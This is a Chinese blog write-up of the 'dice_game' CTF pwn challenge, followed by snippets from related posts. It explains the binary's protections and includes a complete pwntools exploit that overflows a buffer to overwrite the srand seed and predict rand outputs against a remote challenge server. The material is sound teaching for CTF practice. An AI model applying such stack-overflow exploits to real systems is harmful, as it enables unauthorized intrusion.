攻防世界 dice_game栈溢出+随机数

最新推荐文章于 2022-02-19 20:31:35 发布
最新推荐文章于 2022-02-19 20:31:35 发布
阅读量199 收藏 1
点赞数 1
分类专栏: pwn学习 文章标签: 字符串 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/fanghuapyk/article/details/115013926
版权

攻防世界 dice_game栈溢出+随机数

检查保护
在这里插入图片描述

发现是64位程序,并且开启了NX保护和地址随机化

上ida
在这里插入图片描述

发现flag敏感字符,追踪发现sub_B28函数里面可以直接得到flag
这里解释一下

Fopen函数:

FILE *fopen(char *filename, char *mode);

filename为文件名(包括文件路径),mode为打开方式,它们都是字符串。
Fget函数:
函数原型

char *fgets(char *str, int n, FILE *stream);

参数:
• str-- 这是指向一个字符数组的指针,该数组存储了要读取的字符串。
• n-- 这是要读取的最大字符数(包括最后的空字符)。通常是使用以 str 传递的数组长度。
• stream-- 这是指向 FILE 对象的指针,该 FILE 对象标识了要从中读取字符的流。

srand() 函数:
用来设置 rand() 产生随机数时的随机数种子。参数 seed 必须是个整数,如果每次 seed 都设相同值,rand() 所产生的随机数值每次就会一样。

我们分析程序,发现我们要猜对50次数字才能得到flag,我们这里将rand的种子设置为1,然后利用libc中的rand函数,直接输出随机数的值,然后在把值输入程序中,这样我们就能够得到正确的随机数了

利用方式:
程序中出现
在这里插入图片描述
Exp如下:

#!usr/bin/python
#coding=utf-8
from pwn import *
from ctypes import *
context(arch="amd64",os="linux")
p=remote("220.249.52.133",38591)
#e=ELF("./guess")
#libc=e.libc
libc = cdll.LoadLibrary("/lib/x86_64-linux-gnu/libc.so.6")
offset=0x40
payload=offset*'a'+p64(1)
p.sendlineafter("name:",payload)
libc.srand(1)
for i in range(50):
	num=str(libc.rand()%6+1)
	p.sendlineafter("point(1~6):",num)
p.interactive()
一点.
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界-pwn dice_game(栈内变量覆盖)
菜的只能随便写写博客
10-09 500
  0x01 检查文件  下载附件之后获得两个文件,一个可执行文件和一个libc,初步理解要使用libc。 64位elf 无栈保护 动态链接   0x02 程序分析  根据程序运行分析,程序应该是要求猜数字,连续答对50轮可获得flag。   0x03 IDA结构分析  从里面分析,可以看到程序的结构,while循环里面是猜数字的流程,一共50轮,并可以注意到18行设置了随机数的种子。...
攻防世界pwn——dice_game
qq_62076255的博客
12-19 430
攻防世界pwn——dice_game做题记录
攻防世界 Pwn dice_game
MrTreebook的博客
12-18 283
攻防世界 Pwn dice_game1.题目下载地址2.checksec3.IDA分析4.exp 1.题目下载地址 点击下载 2.checksec 没有canary,可能是简单的栈溢出 3.IDA分析 在sub_A20()中可以看出v2是一个通过种子生成的 1~6 的 随机数 之前有做过类似的题,只要控制种子即可预测随机数 在read函数处有栈溢出的漏洞 在下面看到需要连续答对50次才可以获取flag 那么我们构造的思路就是利用这个溢出点覆盖seed从而预测随机数 4.exp from pwn im
攻防世界-pwn-dice_game(srand(),rand(),随机数)
hanqdi_的博客
06-27 1826
高手进阶区 dice_game 考察知识点: srand(),rand()函数,产生随机数。 srand和rand()配合使用产生伪随机数序列。 rand函数在产生随机数前,需要系统提供的生成伪随机数序列的种子,rand根据这个种子的值产生一系列随机数。 如果系统提供的种子没有变化,每次调用rand函数生成的伪随机数序列都是一样的。 比如:通常可以利用系统时间来改变系统的种子值,即srand(time(NULL)),可以为rand函数提供不同的种子值,进而产生不同的随机数序列。 如果srand(1),因为1
攻防世界高手进阶区——dice_game
weixin_62675330的博客
02-19 1912
攻防世界高手进阶区——dice_game 题目里面啥都没有。 一.分析文件 checksec 只有栈溢出保护关闭了,其他都是开着的。 运行 可以看出是要猜数字,猜对50次。 ida逆向 __int64 __fastcall main(int a1, char **a2, char **a3) { char buf[55]; // [rsp+0h] [rbp-50h] BYREF char v5; // [rsp+37h] [rbp-19h] ssize_t v6; // [
dice_game
03-11
Dice_Game 两人游戏,旨在与朋友一起玩或在计算机上玩。 在这个游戏中,使用了六个面的骰子。 玩家将轮流滚动六张面Kong的骰子,直到有人达到一百张并赢得比赛为止。 轮到玩家时,他们可以选择滚动或按住。 如果...
Dice_Game
03-13
Dice_Game
flutter_dice_game
03-11
flutter_dice_app 一个新的Flutter应用程序。 入门 该项目是Flutter应用程序的起点。 如果这是您的第一个Flutter项目,那么有一些资源可以帮助您入门: 要获得Flutter入门方面的帮助,请查看我们...flutter_dice_game
功防世界dice_game
weixin_34190136的博客
05-03 255
buf 长度最长为 0x50 但是当输入大于 49 的时候不会被截断,所以我们只要覆盖到之前的 seed 就可以为所欲为了。 同时注意到 seed 跟 buf 相差的偏移是 0x40,所以只要 68 个字符就可以溢出覆盖 seed 了。 Exploit 由于担心 python 的 randint 实现跟 libc 的不太一样,所以我写了个小程序 在vim编译运行.c文件步骤:...
攻防世界-dice_game-Writeup
SkYe's Blog
05-13 793
dice_game 题目来源: XCTF 4th-QCTF-2018 考点:栈溢出、混合编程 基本情况 程序实现的是一个具有用户姓名输入的菜随机数程序。 保护措施 Arch: amd64-64-little RELRO: Full RELRO Stack: No canary found NX: NX enabled PIE: PIE enabled 栈溢出 一开始我在纠结是输入数字时使用的是短整型,可不可能是整型溢出,这样既能保持低位数字符合要求,又能控制
dice_game:Jogo de dados,aoualizar apáginamostra o vencedor
03-08
骰子游戏 Sobre o projeto: Jogo de dados,或其他人。 Tecnologia ultilizada:Java语言 Demonstração: 结果会议结果: 拜拜 :rocket:
攻防世界(Pwn)dice_game, 栈溢出覆盖srand种子
半岛铁盒的博客
03-05 1386
说明 这其实是一种类型题,新手刚开始会碰到,题目大致过程是 有个srand()的随机函数.需要覆盖 seed种子 即srand(seed) 把 seed 覆盖为一个固定的数 , srand 就是伪随机函数了, 题目会有个猜数循 环,比如猜对了20次flag就有了,和这道题类似的题目还有新手区的guess_num 解题 点进去read中的 buf; EXp from pwn import * from ctypes import * p=remote('111.200.241.244','38
攻防世界 PWN 高手进阶 dice_game (write up)
qq_44768749的博客
08-18 373
攻防世界 PWN 高手进阶 dice_gamedice_game0x01 查看保护机制0x02 反汇编main:sub_A20():sub_B28():0x03利用过程功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 dice_ga
攻防世界(Pwn) forgot---栈溢出;(方法一)
半岛铁盒的博客
03-02 654
介绍 这道题表面看起来有点复杂,其实很简单,有两种方法可以来做这一道题; 方法一 文件运行流程是: 1.先输入名字 2. 输入一串字符串 3.for循环验证字符串v5的值改变;4.返回v3[–5]函数; 1.溢出点 scanf函数 2.漏洞利用 最终返回的是 v3[--v5] 的一个函数, v5的值是在for循环之中改变的;v5的初始值是1; 把函数返回的目的地改为   0x80486CC就可以了; 只要修改 v3[0]-v3[9] 其中一个就可以了,这里选择修改v3[0] v3[--
xctf 攻防世界-dicegame writeup
qq_43189757的博客
07-07 378
比较容易发现可以对buf进行缓冲区溢出,继续往下看 可以发现获得flag的条件是循环50次,50次输入的v1值与随机数v2 都相等 根据前面发现的缓冲区溢出可以发现我们可以覆盖掉seed种子值 那么种子值可以被我们随意设置为一个任意值,我把它设置为0,有了种子值可以写一个c程序把50次产生的随机数都求出来 有了随机数便可以编写exp了 C程序: #include <stdio.h&...
dice_game攻防世界进阶区
shanwei274的博客
04-10 1689
dice_game XCTF 4th-QCTF-2018 前言,不得不说,虽然是个简单题但是还是要记录一下,来让自己记住这些东西。 考察的知识点是: 1.cdll_loadlibrary加载对应库使得Python可以使用c的函数。 2.关于srand函数中种子的介绍。 3.一些平时没有见过的杂项 保证我写的很详细,因为我也是个菜鸡 ----第一步查看保护喽 第一眼就很恐怖嗷,居然就只有canary没有开,其他的全开,got表也不能修改,我就很痛苦嗷 ----第二步ida看看 main函数这里要说的呢 1
攻防世界(Pwn) forgot---栈溢出;(方法二)
半岛铁盒的博客
03-02 294
攻防世界(Pwn) forgot—栈溢出;(方法一) 里面对问题描述的更详细一点 返回目标函数 0x80486CC 方法二(爆破流) 因为最终返回的是 v3[0]-v3[9] 之中的一个函数, v3[--v5] v5的值随着for循环 会发生改变 v2输入是溢出点 v2,v3两组数据在栈上是相邻的, v2的长度大于 20h之后就会覆盖v3的返回值了 干脆把v3[0]-v3[9]函数全部改为目标函数的地址就可以了:0x80486CC 此时无论v5等于什么,我们都会得到目标 fla
ret2text失败--记录一次简单的栈溢出
lifanxin的博客
01-20 473
ret2system程序样本程序漏洞Exp总结 程序样本 来自攻防世界的level0样本,检查样本文件,是64位的小端程序,并且只开启了NX保护。 程序漏洞 如上图所示,该程序有非常明显的栈溢出并且存在后门函数,所以下面直接上Exp,并且解释下载ubuntu20.04上遇到的漏洞利用问题。 Exp from pwn import * context(os="linux", arch="amd64", log_level="debug") #p = remote("220.249.52.134",
dice_game XCTF 4th-QCTF-2018
qq_41071646的博客
04-27 1074
其实感觉这个题 不算是pwn题。。。 这 pwn 里面就是 读取flag 文件 然后我们看一下 sub_a20 这个函数 随机数啊 本来我没有想用 把种子给 覆盖掉 但是 time(0) 感觉不稳 时间一万一不对劲 那么随机数 也会出错 所以干脆 把种子固定下来 下面是 exp #coding:utf-8 from pwn import* list...
根据提示,在右侧编辑器 Begin-End 区间补充代码,实现下面两个函数的功能。 two_dice():返回两个骰子的点数之和; two_dice_game(rounds):rounds为赌博轮数,即蒙特卡罗方法模拟次数,函数返回玩家的胜率。
最新发布
05-28
下面是实现two_dice和two_dice_game函数的代码: ```python import random def two_dice(): return random.randint(1, 6) + random.randint(1, 6) def two_dice_game(rounds): wins = 0 for i in range(rounds...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值